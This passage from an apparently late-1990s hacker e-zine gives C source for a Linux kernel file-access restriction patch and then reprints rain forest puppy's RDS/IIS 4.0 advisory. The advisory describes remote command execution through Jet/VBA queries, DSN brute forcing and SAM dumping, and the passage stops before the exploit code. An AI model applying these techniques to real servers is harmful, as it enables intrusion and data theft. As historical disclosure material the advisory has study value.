(IS_APPEND(inode)) { if ((flag & FMODE_WRITE) && !(flag & O_APPEND)) goto exit; if (flag & O_TRUNC) goto exit; } if (flag & O_TRUNC) { error = get_write_access(inode); if (error) goto exit; /* * Refuse to truncate files with mandatory locks held on them. */ error = locks_verify_locked(inode); if (!error) { DQUOT_INIT(inode); error = do_truncate(dentry, 0); } put_write_access(inode); if (error) goto exit; } else if (flag & FMODE_WRITE) DQUOT_INIT(inode); return dentry; exit: dput(dentry); return ERR_PTR(error); } -----[ END OF ADULT CONTENTS ]----- This function checks permissions, resolvs symlinks and so on, when everything is ok return dentry and permission is granded. We don't want to lose normal restrictions and have our auditfile rules overrule general permissions so we have to put our rules as last, just before return dentry. This is how i implemented it: -----[ WARNING ADULT CONTENTS ]----- /* * open_namei() * * namei for open - this is in fact almost the whole open-routine. * * Note that the low bits of "flag" aren't the same as in the open * system call - they are 00 - no permissions needed * 01 - read permission needed * 10 - write permission needed * 11 - read/write permissions needed * which is a lot more logical, and also allows the "no perm" needed * for symlinks (where the permissions are checked later). */ struct dentry * open_namei(const char * pathname, int flag, int mode) { int acc_mode, error; struct inode *inode; struct dentry *dentry; mode &= S_IALLUGO & ~current->fs->umask; mode |= S_IFREG; dentry = lookup_dentry(pathname, NULL, lookup_flags(flag)); if (IS_ERR(dentry)) return dentry; acc_mode = ACC_MODE(flag); if (flag & O_CREAT) { struct dentry *dir; if (dentry->d_inode) { error = -EEXIST; if (flag & O_EXCL) goto exit; #ifdef CONFIG_SECURE_FIFO if (!S_ISFIFO(dentry->d_inode->i_mode)) goto nocreate; #else goto nocreate; #endif } dir = lock_parent(dentry); if (!check_parent(dir, dentry)) { /* * Really nasty race happened. What's the * right error code? We had a dentry, but * before we could use it it was removed * by somebody else. We could just re-try * everything, I guess. * * ENOENT is definitely wrong. */ error = -ENOENT; unlock_dir(dir); goto exit; } #ifdef CONFIG_SECURE_FIFO /* * Don't write to FIFOs that we don't own in +t directories, * unless the FIFO is owned by root. */ if ((inode = dentry->d_inode)) if (S_ISFIFO(inode->i_mode) && !(flag & O_EXCL) && (dir->d_inode->i_mode & S_ISVTX) && inode->i_uid && current->fsuid != inode->i_uid) { security_alert("denied writing FIFO of %d.%d " "by UID %d, EUID %d, process %s:%d", "writes into a FIFO denied", inode->i_uid, inode->i_gid, current->uid, current->euid, current->comm, current->pid); error = -EACCES; unlock_dir(dir); goto exit; } #endif /* * Somebody might have created the file while we * waited for the directory lock.. So we have to * re-do the existence test. */ if (dentry->d_inode) { error = 0; if (flag & O_EXCL) error = -EEXIST; } else if ((error = may_create(dir->d_inode, dentry)) == 0) { if (!dir->d_inode->i_op || !dir->d_inode->i_op->create) error = -EACCES; else { DQUOT_INIT(dir->d_inode); error = dir->d_inode->i_op->create(dir->d_inode, dentry, mode); /* Don't check for write permission, don't truncate */ acc_mode = 0; flag &= ~O_TRUNC; } } unlock_dir(dir); if (error) goto exit; } nocreate: error = -ENOENT; inode = dentry->d_inode; if (!inode) goto exit; error = -ELOOP; if (S_ISLNK(inode->i_mode)) goto exit; error = -EISDIR; if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE)) goto exit; error = permission(inode,acc_mode); if (error) goto exit; /* * FIFO's, sockets and device files are special: they don't * actually live on the filesystem itself, and as such you * can write to them even if the filesystem is read-only. */ if (S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) { flag &= ~O_TRUNC; } else if (S_ISBLK(inode->i_mode) || S_ISCHR(inode->i_mode)) { error = -EACCES; if (IS_NODEV(inode)) goto exit; flag &= ~O_TRUNC; } else { error = -EROFS; if (IS_RDONLY(inode) && (flag & 2)) goto exit; } /* * An append-only file must be opened in append mode for writing. */ error = -EPERM; if (IS_APPEND(inode)) { if ((flag & FMODE_WRITE) && !(flag & O_APPEND)) goto exit; if (flag & O_TRUNC) goto exit; } if (flag & O_TRUNC) { error = get_write_access(inode); if (error) goto exit; /* * Refuse to truncate files with mandatory locks held on them. */ error = locks_verify_locked(inode); if (!error) { DQUOT_INIT(inode); error = do_truncate(dentry, 0); } put_write_access(inode); if (error) goto exit; } else if (flag & FMODE_WRITE) DQUOT_INIT(inode); if (current->auditfile_len > 0) { int i; char *filename; int errorauditfile=0; if (pathname[0] != '/') { char *page = (char *) __get_free_page(GFP_USER); struct dentry * dentrybackup = dentry; if (page) { char * end = page+PAGE_SIZE; char * retval; struct dentry * root = current->fs->root; int buflen = PAGE_SIZE; *--end = '\0'; buflen--; for (;;) { struct dentry * parent; int namelen; if (dentry == root) break; dentry = dentry->d_covers; parent = dentry->d_parent; if (dentry == parent) break; namelen = dentry->d_name.len; buflen -= namelen + 1; if (buflen < 0) break; end -= namelen; memcpy(end, dentry->d_name.name, namelen); *--end = '/'; retval = end; dentry = parent; } dentry = dentrybackup; filename=retval; free_page((unsigned long) page); } else { printk(KERN_INFO "auditfile: out of memory, dropped auditfile security\n"); return dentrybackup; } } else { filename = pathname; } for(i=0;iauditfile_len;i++) { if (current->auditfile[i] == 0) { if (current->auditfile[i+1] == 0) break; if ((((flag & FMODE_WRITE) && (current->auditfile[i+1] == 2) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_WRITE)) && (((flag & FMODE_READ) && (current->auditfile[i+1] == 1) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_READ))) { if (auditfile_expression(filename, current->auditfile + i + 2) == 1) { errorauditfile = 1; break; } } } } if (errorauditfile != 1) { error = -EACCES; goto exit; } } return dentry; exit: dput(dentry); return ERR_PTR(error); } -----[ END OF ADULT CONTENTS ]----- The function auditfile_expression is the following: -----[ WARNING ADULT CONTENTS ]----- int auditfile_expression(char *string_base, char *string_mask) { int i, j, ok=0; for (i=0;;i++) { if (((string_mask[i] == 0) && (string_base != 0)) || ((string_mask[i] != 0) && (string_base == 0))) return 1; if (string_mask[i] == '*') { for (j = 0;;j++) { if (auditfile_expression(string_base + i + j, string_mask + i + 1) == 1) return 1; if (string_base[i+j] == 0) return 0; } } else if (string_base[i] == string_mask[i]) ok = 1; else return 0; } return ok; } -----[ END OF ADULT CONTENTS ]----- And basically does the matching for bl*t on blaat and so on. ----------[ some options i use at my box in.telnetd.conf b/dev* r/etc/* r/lib/* r/usr/* b/home/* r/bin/* b/tmp/* b/var/* website.telnetd.conf b/dev* r/etc/* r/lib/* r/usr/sbin/website r/home/website* w/home/website/.bash_history r/bin/* b/var/* r/sbin/su r/usr/bin/dircolors r/security* r/usr/bin/vi r/usr/bin/vim r/usr/bin/talk r/root/.bashrc r/usr/local/bin/tty r/usr/local/bin/who r/usr/bin/write r/usr/bin/mesg r/usr/bin/grep r/usr/bin/awk r/usr/bin/sed r/usr/bin/less r/usr/lib* (Yeah these are the restrictions i use on the shell on our website) ------------------------------------------------------------------------------- Download my Auditfile tarball for examples how to use this, the shell on our website is secured with auditfile. Some Extra Security In The Linux Kernel - Auditfile a paper by Frank van Vliet alias {} karin@root66.nl.eu.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ RooT66 http://root66.nl.eu.org ShellOracle http://www.shelloracle.cjb.net ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ @HWA 158.0 Lets hack an NT box...how they are being defaced & how to secure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Info submitted by: anon_defacer & compiled/assembled by Ed. Intro: ~~~~~~ This isn't exactly bleeding edge information, I know, BUT nonetheless sites are still currently being actively defaced en-masse using these techniques (known simply as 'the RDS hack' around the net) so I thought it prudent to print the info and current available attack/patch options that are in use or should be employed on your NT server. - Ed Source: http://www.wiretrip.net/rfp/p/doc.asp?id=1&iface=2 rainforest puppy's advisory and code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wiretrip.net/rfp/p/doc.asp?id=5&iface=2 #### ALERT! #### RDS/IIS 4.0 Vulnerability and exploit #### ALERT! #### By rain forest puppy / ADM / Wiretrip "it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" -Russ Cooper, NTBugtraq "This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq "Groovy, baby." -Austin Powers, Spy who Shagged Me - - - Table of Contents: 1. Names, PRs and the Media: State of Security Advisories 2. RDS Vulnerability Background 3. *MY* Guess at Greg's RDS Vulnerability 4. Bonus Aspects of My Version of the Exploit 5. Command Line Options 6. Random Q & A 7. Signoff 8. The code!!!! - 1 - Names, PRs and the Media: State of Security Advisories When I was at DefCon, I had an interview with a reporter who was doing a story on 'hacker handles'. Of course, with a handle like Rain Forest Puppy, I was a sure-win. After a 20 minute chat, the last question he asked me was "What is your real name?" Of course, my response was "does that matter?" Well, to him it did. It seems like it matters to all the big, formal media types and vendors. A perfect example of this would be the whole RDS saga. Greg Gonzalez's original post gave me credit, since he used some of what I talked about in my ODBC advisory posted to Bugtraq earlier (thanks, Greg!). Russ Cooper did a recap, but failed to mention me. Microsoft's advisory acknowledged Russ and Greg as well, sans me. Now, I'm not an egomaniac that needs to see my name splashed over everything. For that matter, those of you who know me personally know how laid back I am concerning most issues. The point I'm trying to make is whether or not a name is 'unsuitable' for mention in something as flashy as a Russ or MS post (although side note, I must admit, Wired and ZDNet have lightened up to this fact, especially lately with all the Dildog and Orifice talk going on). If I remember correctly, David Litchfield got some mentions for various vulnerability findings he had. But everyone referenced him as David Litchfield, not 'Mnemonix', which is his hacker handle (BTW, greetings to Mnemonix. Thanks for serving as an example. :) Even lately, for those of you Bugtraq fans out there (hey, how the hell are you reading this, anyway!?!?!), you'll have noticed gone are the loveable bytes of 'Aleph1' in place of Elias Levy. Now, in Aleph1's defense, I can see justification of the shift. But the general fact that there is a need/trend for a shift is concerning me. The only taboo I can think of for the 'evil' of a hacker handle is the issue of the obvious: anonymity. Apparently I must be running around doing 'very bad things' (funny movie, BTW), and so I need to hide who I really am, right? Uh, no. (For lack of a snappy comeback) I don't want to make this diatribe overly long, since I know you're only here for the exploits anyway :) But seriously, why use a handle? Well, there is a sense of tradition, for one. I shall not explain, because I think it's apparent. The other is a sense of community. If you're going to engage in a security discussion, why not do it with other security professionals. And where can you just so happen to find a large gaggle of people who know about security? Your local IRC server, sitting in #hackphreak (watch out, JP logs), #hackteach, etc. These people have nicknames themselves. So get yourself a nick and join in the conversation! But really, I use an alias. Does that make me evil? If I told you my real name, would that shift your perspective of me into the light of good? We'll get back to this, I want to transgress to another issue. I use a handle. My only collateral at this point is my name, and my name alone. If I find a big hole, post a research paper, etc, it adds nothing but perhaps an "atta'boy" to the accomplishments of my nickname. I've talked to people in real life and held discussions about that 'Rain Forest Puppy' guy, they not knowing I was Rain Forest Puppy. The accomplishments belong to that name, and that name alone...unless I start equating that name with other things. So, let's pretend I did. Let's say I tossed my real name out there, and got that associated with my handle. Now people in real life will equate the findings of Rain Forest Puppy to me. I can add in my company name. Now my company can ride the 'success' (if you will) of my findings as well, just because they're associated with my name. (Come on, you know these situations exist. Transmeta is cool just because the name 'Linus' is involved.) If I equate all kinds of aspects together, I can then distribute the attention (a.k.a. advertising) to them all as well. Think about it....if I found the next remote root compromise in, say, sshd, I could slap not only my handle and name but also my company name (Amazonian Trees, Inc) all over it! Wow, would that not be great marketing for Amazonian Trees, Inc, especially if it ATI's primary service was security related! But hey, it's America. We live to make money, so it seems. So why not do this? Right? Well, 'tis also the trend. Look at all the press releases on security issues. The most recent one was by Greg Gonzalez himself, for his company Information Technologies Enterprises, Inc. The press release is at http://www.infotechent.net/itenews.htm Now, what I find interesting is that Greg has made a post to NTBugtraq about the RDS vulnerability, yet will not release details of the vulnerability until next week. Hmmm. Ok, so he can't release details, but he can release press releases about it. Your point was made with the post to NTBugtraq...the point of the press release is to ride the fame to gain corporate exposure (which I'm equating as an excessive, corporate, political machine type move which isn't all that wonderful). Not to pick on Greg, because it's the trend. Look at WebTrends. They issued a press release on 'their finding of security vulnerabilities in IIS sample scripts' (never mind the fact that I had talked about such in a previous Phrack article last December). The press release is at http://www.webtrends.com/news/releases/release.asp?id=81 Wow, a vendor of a security scanner using the finding of vulnerabilities as free marketing for their products. Well, do it where you can, right? I will move off this subject, because L0pht has a nice long composition on the matter in the Soapbox on their website, at http://www.l0pht.com/~oblivion/soapbox/index.html One interesting statement L0pht makes, going back to Greg Gonzalez and Russ Cooper keeping the details of the RDS vulnerability to themselves for a week: "Now we have software vendors keeping things secret. At least secret for a substantial period of time. Is this the way we want the industry to behave?" Wow, right on, brothers Mudge, Dildog, Weld Pond et al. Greetings, BTW. ---- Credits and Thank Yous ---------------------------------------------- I'd like to take this brief moment to say thank you to L0pht (www.l0pht.com) for helping me test my perl script and taking time to review my advisory. I'd also like to thank Vacuum of www.technotronic.com and Mike Dinowitz of www.houseoffusion.com for their input and testing as well. -------------------------------------------------------------------------- So back to the 'only a handle' thing. You have to understand that I have a different perspective on it all. I publish everything under an anonymous handle. What do I gain from this? Nothing personally. Nadda. Zip. The handle itself may gain some fame, but not me personally. I do not profit from this one way or another. What I do I do because I want to, on my free time--and do it in a manner that is not greedy in any aspect. I don't seek to gain, and in the current setup, I really can't gain a whole hell of a lot. But I'm the bad guy, I forgot. It's much more normal to leverage a security vulnerability as a marketing tool than it is to just 'give' time and research away. Wow, I need to get with the Y2K I guess. Fine then. (Last tangent, then we'll get to the RDS issue, I promise :) So, going back to you seeing me in the light of good.... Could you better relate if you had a 'normal' name? Are you embarrassed to say/use 'Rain Forest Puppy' in conversation/publication? (Well, I mean this generically for all hacker handles, but I'm specifically talking about mine here) Would I be seen as more a security resource/less of a evil hacker if you had a name to associate with my handle? Well, I guess I should make that step. From now on, you can associate Mr. Russell F. Prigogine with the nick Rain Forest Puppy (Hmmm...no, the initials are not mere coincidence...clever, eh?). But since the big 'Russ' on campus is Russ Cooper, NTBugtraq moderator extraordinaire (who believes sample apps are not a security concern worth talking about. Real slick, Russ), I would prefer to have be used Mr. R.F. Prigogine (Mr. optional), if you can't--or don't want to--use the nick Rain Forest Puppy. So there. (As some would say) I sold out (oh, the horror of it). JP, add that to your profile database. While I gather the broken pieces of my dignity we'll move along to what you really want... - 2 - RDS Vulnerability Background Last Friday Greg Gonzalez (re)posted his findings of vulnerabilities in regards to the RDS problems originally detailed in MS98-004, which came out around July 16, '98. He took that issue (which is basically the simple fact that 'Remote Data Service' components allow *remote* access to your *data*....who would have thought?) and combined it with the Jet pipe/VBA delimiter 'feature' I discussed in my recent advisory. The result? 1. You can make remote queries via RDS 2. You can embed NT command line commands in queries Well, that's a pretty good combo. (side note, not to brag or anything, but I mention the fact that RDS can be used to do that in my ODBC advisory, under the title 'Msadc'). But, Greg threw in a twist which supposedly is the kicker: 3. You don't need user IDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database I suppose that's a pretty big kick. Wow, no UIDs/passwords, NO SAMPLE SCRIPTS! Well, I guess that means Russ Cooper will let the post through then... (if you don't get it, go back and re-read section one). So Greg can do all that. And, to reiterate how dangerous this problem really is... "it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" -Russ Cooper, NTBugtraq "This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq *** MEDIA FOLKS *** As it seems it's fun to attach dollar loss amounts advisories, I will say the potential amount of damage, due to the fact that at least 50% of all IIS servers Greg has seen (hopefully he's seen a lot) are vulnerable, using my sophisticated reliable statistical computation method that is authoritative, I'd place damage loss somewhere in the 'close to Bill Gates salary(tm)' range. Now, the sad part. As I mentioned before, both Greg and Russ (from this point on, all instances of 'Russ' refer to Russ Cooper, and not the name R. F. Prigogine) both know the details of this vulnerability. And yet they are keeping them amongst themselves until next week. Does this even disturb anyone? Greg says at least 50% of the IIS servers are vulnerable... DO WE WANT RUSS COOPER WITH THE KEYS TO 50% OF IIS SERVER ON THE INTERNET? Ok, I have a scenario that's the same in principle, but will disturb people even more: ---- Begin same scenario ------------------------------------------------ Rain Forest Puppy (or R. F. Prigogine, if it makes you feel better/is more visually pleasing) has found a hole in the latest build of Apache web server. There's a hole. I will announce there's a hole. I'll write up a few PRs as well. But I will not tell you the exact nature of it. Don't worry, Apache group will code a fix, and you'll be all set in a jiffy. In the meantime, I'm not going to release the details of the exploit of the hole. Instead I'm going to just keep it to myself....and my good buddies Vacuum, Antilove, Stranger, and the rest of the Wiretrip and ADM crews. ------------------------------------------------------------------------- Hmmm....I bet *that* disturbed you. How about a better translation: ---- Begin translated same scenario ------------------------------------- I, RFP, have found a hole in Apache that I will not tell you about until later, but in the meantime, me and my hacker buddies will know about it! Nnnnnnaaaaaaayyyyyyaaaaahhhhhh! So sit back and feel helpless. ------------------------------------------------------------------------- What's the difference? Only the integrity of the people involved. Again, a name thing perhaps. Russ Cooper, Greg Gonzalez, they're Ok. Rain Forest Puppy, Antilove, nope, that's scary. You don't even know if Greg Gonzalez isn't really a hacker that goes by 'Digital Killer'. I push for the point that no matter who it is in any case, it's wrong. Elias Levy would have told everyone the bug. :) NTBugtraq = moderated disclosure. Hmmm. I still like Russ's "Would you pay?" Administrivia from Feb 99, in which he says: "Someone else makes the Security Portal and you get what they think you need" As oppose to getting what Russ thinks we need instead? It all depends on whether or not the other guy denies posts about sample scripts....(if you *still* don't get it, re-read section one AGAIN). Ok, ok, so that RDS background turned more into a political thing. Well, that's because it is. At this point, Russ and Greg are have the keys to IIS servers. I don't know about you, but I'm not liking it. So I'm getting off my ass and doing something. Besides the fact that this is all published stuff at this point. Also, I may be considered 'irresponsible' for posting the exploit. Now, I would say *maybe* it would be debatable if I had posted *only* the exploit. But I have posted not only a very long diatribe, but also my guess of the vulnerability, which includes examples of analysis and theory. My hopes are to educate people on what the problem is, and how I went about finding it so that they can perhaps learn how to do it themselves. Education. It's the key, and that's what I'm trying to do. No, no vendor education...ADMIN education. USER education. I know I will probably be futile as a whole in the end, but maybe a few people will learn something, and that's all that matters to me. - 3 - *MY* Guess at Greg's RDS Vulnerability (I say 'guess' because I may not be right. But in any event, I wouldn't be writing all this unless I found something moderately interesting ;) Ok, so Greg's RDS vulnerability has three main aspects: 1. You only need RDSServer.DataFactory component 2. It uses Jet queries with my embedded VBA via pipes trick 3. You don't need userIDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database Now, for those of you who don't know, RDS is basically a way to do remote data queries to a server. This is done over the web. Basically your client app communicates via HTTP to the /msadc/msadcs.dll on your server. The msadcs.dll exposes the RDSServer.DataFactory object, or better known as the AdvancedDataFactory. Now AdvancedDataFactory only has four methods, so we're kind of limited on what we can do. We can CreateRecordSet, Query, SubmitChanges, and ConvertToString. Query and SubmitChanges require a valid database to work upon. The other two are just data mangling functions. So there you have it, that's what we have to work with. I played with CreateRecordSet and ConvertToString. This actually relays data from the client, to the server, and back. My hopes was that somewhere in there I could slip one of my pipe-VBA-shells in there and do fun stuff. But nope, all they did was regurgitate the data in a different flavor. Oh well. SubmitChanges just basically does an elaborate UPDATE/INSERT, where it just syncs the server's database with the client's recordset. So that leaves Query. Well Query lets us run queries against an (existing) database. And we know we can embed our pipe-VBA-shells in queries, so Query looks good. But this is nothing spectacular. And there is one catch: the need for an existing database. We need to pass a DSN to the ActiveDataFactory to actually run the query on. The problem with the DSN is that: 1. DSNs can require UIDs and passwords 2. There's no way to get a list of available DSNs (** through RDSServer.DataFactory functions, that I'm aware of **) 3. I'd say a DSN constitutes an 'active' database So DSNs blow away point 3 of our known things about Greg's RDS vulnerability. What if we can get around using DSNs? Well, we can. See, you can go the easy route by specifying "DSN=rfp", and then the server keeps all the internal information about that DSN, including driver, actually database file location (if it's a file-based driver), UID, password, connection parameters, etc. Well, what's fun is that we can directly give all that stuff in the query setup instead of a DSN. Let's say we setup a DSN named 'rfp' (for Rain Forest Puppy or R. F. Prigogine). We will use these parameters: DSN name 'rfp' Microsoft Access (Jet) driver c:\rfp.mdb for our database UID will be 'rfp' password will be 'prigogine' So by invoking "DSN=rfp", the server knows to use the Access driver on the c:\rfp.mdb file. DSNs are a nice tight way to precompose all that information. Or we can do it on the fly. Rather than issuing a "DSN=rfp" connect string, I can use instead: "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\rfp.mdb;" This will still invoke the Access (Jet) driver, and tell it to directly use c:\rfp.mdb. No UID. No password. No even worrying about if/what DSNs exist. In the words of Cartman, "Sweet". That whacks out part of known point #3 (no UID or password). We're going to use the RDSServer.DataFactory control (known point #1), and we're going to use the Access driver, with fun pipe-VBA-shell features (known point #2). We're not using any other web sample scripts, so that cuts out another portion of known point #3. Oh, we're so close...can you taste it? (and what does it taste like? chicken?) There's still one minor detail. Notice we have to specify the 'dbq=' parameter in the connection setup. And this needs to be a valid file. If it's not, the SQL engine on the server side will fail and return errors before it even gets around to looking at our queries. But damn, we need an .mdb file to connect to. Well, if you look in the Access ODBC reference on Microsoft's website (which sucks, half the links were broken at various moments through the night while sifting through it...go MS. I don't blame you though--you probably engineered your site/servers with Microsoft products, and that explains it right there) you will see that you can pass a CREATE_DB parameter to the Access driver. This will cause the driver to construct a valid (empty) .mdb file. Woohoo! (not to be confused with w00w00; the former is an expression of joy, the latter is a cool group of guys that I had the fortune of hanging out with at DefCon) So in our connection setup we pass a "CREATE_DB=c:\rfp.mdb" attribute with everything else and low and behold, it...... ----- Some words about my sponsors --------------------------------------- -- www.technotronic.com Technotronic! Great place! Run by fellow Wiretrip'er Vacuum, who is also a co-founder of Rhino9 (before Rhino9 'disbanded'; Neon, Horizon, Xaph: come back to the US!), boasting a slick HTML design recently redone by yours truly (Rain Forest Puppy/R. F. Prigogine), it's definitely a good site for the latest security information--especially while PacketStorm is struggling to get back on its feet (thanks, JP. Now die. What, you're sueing me now?!?) While you're there, be sure to check out: * Winfingerprint! -- coded by Vacuum, this tool lets you remotely query a windows box and see if it's a PDC, BDC, Member server, SQL server, etc. Also look for the Unix port of it by me sometime soon (after I finish all this RDS stuff) * Horizon's Page! -- that's right. Elite HTML coded by Humble himself. Problem was he didn't know where to put the shell code...? J/K :) The URL is /horizon/ * Newest R9 Tools! -- coming soon. Before 3/4ths of Rhino9 moved to Germany, there was one last code fest, and some fun binaries came out of it. Look for them soon! Technotronic also has the R9 mirror at rhino9.technotronic.com -- www.l0pht.com L - zero - p - h - t Everybody knows L0pht (even senators!) A very active 'independant security (watchdog) group' who include Dr. Mudge & Dildog (BO2K creator). While you're there, be sure to check out: * L0phtcrack! -- one of the best NT password crackers out there! This will prove highly useful if you use this exploit do dump the SAM and grab the backup (not that I encourage hacking...I've done this many times in LEGIT contracted audits). It's a personal tool I've standarized on. * Advisories! -- L0pht releases a very nice variety of advisories, from Windows DLL problems and Cold Fusion script problems to Unix race conditions and symlink vulnerabilities. * NFR Modules! -- they've teamed up with NFR to be the supplier of many interesting N-code/NFR modules. They have a nice selection for your popular network attacks. ** plus I must note that the Palm Pilot stuff, Soapbox, and BBS are pretty awesome as well! -- www.houseoffusion.com A great independant Cold Fusion site! The site of a great friend of mine, Mike Dinowitz, who is my 'go to' man for all things Cold Fusion and has helped me out immensely with various Cold Fusion language issues (read: helped me work through some of the various Cold Fusion exploits that have surfaced). He does offer training for Cold Fusion...see 'Training Info' under ''. He co-authored "Advanced Cold Fusion 4.0 Application Development" and "Cold Fusion Web Application Construction Kit" vols 2 and 3, and was the founding member of Team Allaire. Plus, he's an all-around good guy(tm). Also an editor of CF Advisor, at www.cfadvisor.com. While you're there, be sure to check out: * MunchkinLAN! -- a CF based web scanner, which is actually very minimal code and runs out of an Access db. * Mike's Mods! -- many modifications to the Cold Fusion Forums scripts, which include speed/operation improvements. * CF-Talk! -- Mike is the moderator/owner of the CF-Talk list, which is a high traffic list discussing Cold Fusion related development issues, security, etc. -- Thanks again to all of the above! ------------------------------------------------------------------------- ...didn't work. Damn. The problem was that it was passing the CREATE_DB parameter during the SQLDriverConnect() phase, and that just isn't going to cut it. We need to issue a SQLConfigDataSource() call (I think that was it...my mind is a mush of ODBC/SQL/RDS/ADO/OLEDB/FMP API right now) to get CREATE_DB to do it's thing, and RDSServer.DataFactory.Query just wasn't going to give us love. So, after struggling with other nuances and ideas, I concluded that I couldn't make a DSN, or a .mdb from scratch using Access SQL via RDSServer.DataFactory without connecting to a database/.mdb beforehand. (**NOTE: if you know how this can be done, EMAIL ME! I WILL TRADE YOU 0DAY! :) rfp@wiretrip.net ) Well damn, so we need a database to make this work. Any 'ol database will do (hell, even the WINS or DHCP .mdb should work >:). But unfortunately, none come by default on a standard NT install. Bummer. But wait....all is not lost.... It seems when you do a 'typical' or better install with Option Pack 4, a particular .mdb is installed...namely the btcustmr.mdb which is installed to %systemroot%\help\iis\htm\tutorial\. Microsoft saves the day! They're just so damn efficient at helping us hack their own product... To get IIS 4.0 you practically need to install Option Pack 4, which will also then install MDAC 1.5--this is good. Let's just hope they didn't pick the 'minimal' install... The last catch is that we need to figure out what %systemroot%. On the majority of the systems it will probably be c:\winnt, d:\winnt, e:\winnt, or f:\winnt (don't laugh, mine is f:). I guess some wacko might do \win, \windows, \nt, and if you upgrade it may be \winnt351 or \winnt35. Well, we can do a little 'brute force' on all those combinations until one works. Oh, and no, you can't do "dbq=%systemroot%\help\iis\htm\tutorial\btcustmr.mdb"...the SQL driver pukes. So that's my guess! Mr. Gonzalez is using a connection string similar to "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;" with a query that contains one of the pipe-VBA-shell commands. Now, I think this technically meets all the known points of the exploit--the only fuzzy one is where Greg mentions "no need of an *active* database". Now, I may be reading into it, but btcustmr.mdb is hardly active. It's a totally unused .mdb sitting in a directory most people probably didn't know existed. Just to double check, I did a quick little test...and six of the ten servers I picked off the Internet were susceptible to this method. That'd a tad better than Greg's 50%, but I had a small population sample, so I'll give him the benefit of the doubt. Now, I obviously could be wrong. Maybe Greg found a way to create the .mdb, or some other way where he doesn't need to rely on the existence of btcustmr.mdb. I'm not claiming to be a SQL/database wiz--actually, I hate database applications. Period. They're gross. But I put up with it for the better good of the Internet. :) But yes, I could be wrong, and I'm willing to admit it. Let me also mention the contenders. They were contenders, but definitely did not make the final round because as much as the 'look' and 'smelled' exploitable, I couldn't get them to crack: 1. Data Shape Provider. This already has hooks into the VBA interpreter ( you can put VBA commands in the CALC() function--except it lacks shell()), and is a primary suspect in my eyes. The bonus is that you do *not* need any database files to use this. Well, barring the fact that I really don't know what I'm doing, I played around with it trying to feed some pipe-VBA-shells to it and whatnot, but couldn't get anything interesting to happen. Now, this is installed by default, has VBA hooks already, doesn't need a database, etc. I say this fits the description more that the btcustmr.mdb thing. And it's just all together 'cooler'. 2. Index Server Provider. Now, not all places use Index Server, so I highly doubted this was the route, but it is a contender. Again, you don't need a database file, so that's a bonus. I tried the usual pipe-VBA-shell commands, but no go either. If I really had to choose, I'd say the exploit was in the Data Shape Provider (which Microsoft also warned of in the advisory). But since I couldn't get it to give me love, I went with btcustmr.mdb. - 4 - Bonus Aspects of My Version of the Exploit So, yes, I could be wrong. But I figure why not just feature pack this exploit to *really* kick some ass? Well, so, I wasted a few brains cells (the things I do for you people...jeez) and thought of some good things to toss into the code. I figure hey, might as well make this a useful tool! The first one is pretty obvious. There are many applications on the market, that would be used on a server, that would make/require a DSN. For instance Cold Fusion creates a few DSNs, as does iHTML. Some of the sample apps that come with IIS create DSNs as well, and the MDAC makes a few too. All these potential DSNs. Remember, it only takes one DSN to work. So if we wanted to, we could scan to see if any of a number of default DSNs exist, and if they do, exploit them. An extension of this would be user created DSNs. Again, all we need is the DSN name, so we can scan for what are 'psychologically' common DSN names. For instance test, web, data, database, www, db, and sql are common type DSN names. Basically, if you supply a dictionary file of DSN names you want to use, the exploit will sit there and brute force, a la a remote password cracker on the DSN names. Of course, we'd need DSNs with the Access Driver. But what's nice is that if we connect to a valid DSN with an invalid SQL query, we'll get back the name of the driver in the error message. So it's a nice way to check. Then we can also do an inverse type thing--instead of looking for common DSNs to connect to, we can look for common .mdbs to connect to. For instance MS Cert Server, DHCP, and WINS all use .mdbs, as well as particular sample scripts, SDKs, etc. We can just try to connect to them directly. If we find one, rather than dealing with the table information within the .mdb, we can just CREATE TABLE on it first, and then exploit the table we just created. Very simple. Another interesting feature is dumping the root scope paths from Index Server. Basically it's a query of "Select paths from scope()". This is useful because it can provide us with useful directory information...since one of the tricky problems is determining location of html files and systemroot (although they're most likely guessable, that's not always the case). So I tossed this in for kicks, although it doesn't run 'inline' with the actually exploit checks. You invoke this functionality separately. The last extra functionality, but the easiest of them all, is to see if /scripts/tools/makedsn.exe exists on the webserver. If it does, we can make a DSN and define the .mdb file to use, and then exploit it right away. In my particular exploit I make a DSN named 'wicca'. (Greetings to Simple Nomad! I wish you could have been around at DefCon. Next time.) So, wow. Lots of ways to get a database connection. My RDS exploit tries them in the following order, continuing until successful: - try raw driver connect to btcustmr.mdb - try to create a DSN with /scripts/tools/makedsn.exe - look for common DSNs - look for common .mdbs - try 'dictionary' attack on user DSNs And separately you can query Index Server to get the paths information (Warning: this could be a lot of information! The script automatically sorts out common directories). ----- Campaign solicitation -------------------------------------------- XOR!! The unofficial AES candidate! There are many reasons why you should support XOR: 1. It's mad fast! 2. It can be implemented in very little code 3. It will run with decent performance even on the meekest of Casio watches 4. The ciphertext doesn't look like the plaintext--this is good. 5. Stream, block, chained, unchained, XOR does it all! 6. So many companies already use it as their encryption algo of choice! So join the 'AES XOR y2k == 8w8' campaign today! ------------------------------------------------------------------------ One interesting feature that's almost necessary is a 'resume' mode. Imagine you just scanned a 